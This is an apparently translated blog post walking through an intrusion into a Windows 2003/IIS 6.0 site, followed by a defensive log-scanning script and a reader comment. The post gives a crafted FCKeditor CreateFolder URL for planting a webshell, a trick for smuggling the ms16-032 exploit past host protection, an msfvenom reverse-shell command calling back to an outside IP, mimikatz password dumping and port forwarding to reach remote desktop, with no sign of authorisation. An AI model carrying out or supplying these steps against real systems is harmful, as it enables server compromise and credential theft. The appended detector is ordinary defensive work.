admin posted on 2018-10-20 20:31:43

From getting a webshell, to bypassing SafeDog and YunSuo for privilege escalation, to getting into the server with Metasploit

<p style="margin:0cm 0cm 0.0001pt;text-align:justify;">
        <table border="0" cellpadding="0" cellspacing="0" width="1122" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;margin-left:.75pt;width:841.5pt;" class="ke-zeroborder">
                <tbody>
                        <tr>
                                <td style="padding:0cm 0cm 0cm 0cm;">
                                        <p align="left" style="font-family:等线;font-size:10.5pt;line-height:19.2pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
                                                <span style="color:#444444;font-family:Verdana,sans-serif;">1. Getting a webshell</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">First I scanned the target site and found it was ASP. The scan turned up the admin backend and the default database directly; I downloaded the database, decrypted the password and logged in, as shown:</span><br />
<img width="553" height="314" src="https://www.2k8.org/content/uploadfile/202203/17/084eed98.png" alt="" style="vertical-align:middle;" /><br />
<img width="600" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/7f2d4fb8.png" alt="222.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">In the backend I found FCKeditor, and the server was IIS 6.0, so I could consider creating an asp directory to trigger the parsing behaviour (the FCKeditor path had been renamed to something else; you see it when capturing the request with Burp Suite).</span><br />
<img width="600" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/2338000b.png" alt="333.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">Next we construct an asp directory, for example:</span>
                                        </p>
                                        <p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
                                                <span lang="EN-US" style="color:#444444;font-family:宋体;font-size:12.0pt;">http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975</span>
                                        </p>
                                        <p align="left" style="font-family:等线;font-size:10.5pt;line-height:19.2pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
                                                <span style="color:#444444;font-family:Verdana,sans-serif;">Then I uploaded a one-line shell in jpg image format into the shell.asp directory and opened it with hatchet. I saw that aspx was supported, so I used the include approach: first rename the aspx file's extension to .rar, then create a 111.ASPx that includes the rar file. Once in, I looked at the processes and saw YunSuo and SafeDog, so, well, we take it slowly, slowly.</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">2. Bypassing SafeDog and YunSuo, escalating privileges and adding an account</span><br />
<img width="600" height="207" src="https://www.2k8.org/content/uploadfile/202203/17/f275795b.png" alt="444.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">I couldn't view system information, but from the site's 404 page I could tell it was a 2003 server, and since C:\Program Files (x86) existed I concluded it was 2003 64-bit. So let's get to it: I uploaded the 64-bit ms16-032 and went straight at it, but found that uploaded exe files (or exploits in other formats) vanished automatically. There was no antivirus in the process list; right, no antivirus, it was a YunSuo feature blocking it. The way to get the upload past YunSuo is to use rar: first pack the exploit as 64.rar and upload it, then look for which directory rar is in, which is C:\Program Files (x86), and go.</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">As shown:</span><br />
<img width="600" height="242" src="https://www.2k8.org/content/uploadfile/202203/17/5d32a305.png" alt="555.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">Running it gave system privileges directly. Then I used the "dog-killer" tool to add an account and used tunna to forward 3968, but it said the account was not in the remote desktop group. Damn. Later I also thought about using getpassword64 to grab the plaintext password, but it hung as soon as it ran, so with no other option I thought of metasploit.</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">3. Using metasploit</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">First generate a 64-bit payload with pentestbox using the following command:</span><br />
<br />
<span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe &gt; c:\mata.exe</span><br />
<br />
<span style="color:#444444;font-family:Verdana,sans-serif;">Why port 443? Earlier, when I tested with other ports, they were blocked outright and the session never came back. Next we run this mata under system, and the session checks in as shown:</span><br />
<img width="600" height="137" src="https://www.2k8.org/content/uploadfile/202203/17/e7cead77.png" alt="11.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">Next we grab the plaintext passwords with these commands. Command 1: use mimikatz. Command 2: kerberos. As shown below:</span><br />
<img width="601" height="260" src="https://www.2k8.org/content/uploadfile/202203/17/95df3652.png" alt="13.png" style="vertical-align:middle;" /><br />
<span style="color:#444444;font-family:Verdana,sans-serif;">Next we set up a listener with the following command:</span><br />
<br />
<span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">portfwd add -l 6655 -p 3968 -r 127.0.0.1</span><span style="color:#444444;font-family:Verdana,sans-serif;">. This command forwards the target server's remote port 3968 to port 6655 on pentestbox's public IP, as shown:</span><br />
<img width="600" height="194" src="https://www.2k8.org/content/uploadfile/202203/17/5520c6cf.png" alt="18.png" style="vertical-align:middle;" />
                                        </p>
                                </td>
                        </tr>
                </tbody>
        </table>
</p>
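A defender-side check added here (example code, not from the post or any project): it scans IIS W3C log lines for FCKeditor connector requests that create, or upload into, a folder whose name ends in an IIS 6 script extension, which is the parsing trick the post walks through. The W3C field order and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote

# IIS 6 executes any file inside a directory whose name ends in one of these
# extensions, so a folder such as "shell.asp" created through an editor
# connector is the condition worth alerting on.
IIS6_EXEC_EXTS = (".asp", ".asa", ".cer", ".cdx")

# FCKeditor connector path, matched by its tail so a renamed editor directory
# (the post's target used /hscxeditor/) is still caught.
CONNECTOR_RE = re.compile(r"/filemanager/connectors/\w+/connector\.\w+$", re.I)

def exec_ext_segments(path):
    """Path segments ending in an IIS 6 script extension; decoded twice so
    %252F-style double encoding cannot hide them."""
    decoded = unquote(unquote(path)).replace("\\", "/")
    return [s for s in decoded.split("/") if s.lower().endswith(IIS6_EXEC_EXTS)]

def check_request(uri_stem, uri_query):
    """Finding string for one request, or None when it looks benign."""
    if not CONNECTOR_RE.search(uri_stem):
        return None
    params = {k.lower(): v[0]
              for k, v in parse_qs(uri_query, keep_blank_values=True).items()}
    command = params.get("command", "")
    if command.lower() not in ("createfolder", "fileupload"):
        return None
    for field in ("currentfolder", "newfoldername"):
        hits = exec_ext_segments(params.get(field, ""))
        if hits:
            return f"{command}: {field} names script-extension folder {hits[0]!r}"
    return None

def scan_iis_log(lines):
    """Scan W3C log lines assumed to start 'date time s-ip cs-method
    cs-uri-stem cs-uri-query'; return (line_number, finding) pairs."""
    findings = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        finding = check_request(fields[4], fields[5])
        if finding:
            findings.append((number, finding))
    return findings

# Constructed sample log (not from the post); line 2 mirrors the post's request.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port sc-status
2018-10-20 12:00:01 10.0.0.5 GET /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z 80 200
2018-10-20 12:00:07 10.0.0.5 GET /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2F&NewFolderName=photos 80 200
""".splitlines()
```

Running `scan_iis_log(SAMPLE_LOG)` flags only the second line; a normal folder creation under `/` with a plain name passes.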

Posted on 2021-11-20 23:30:06

Why are all the images gone?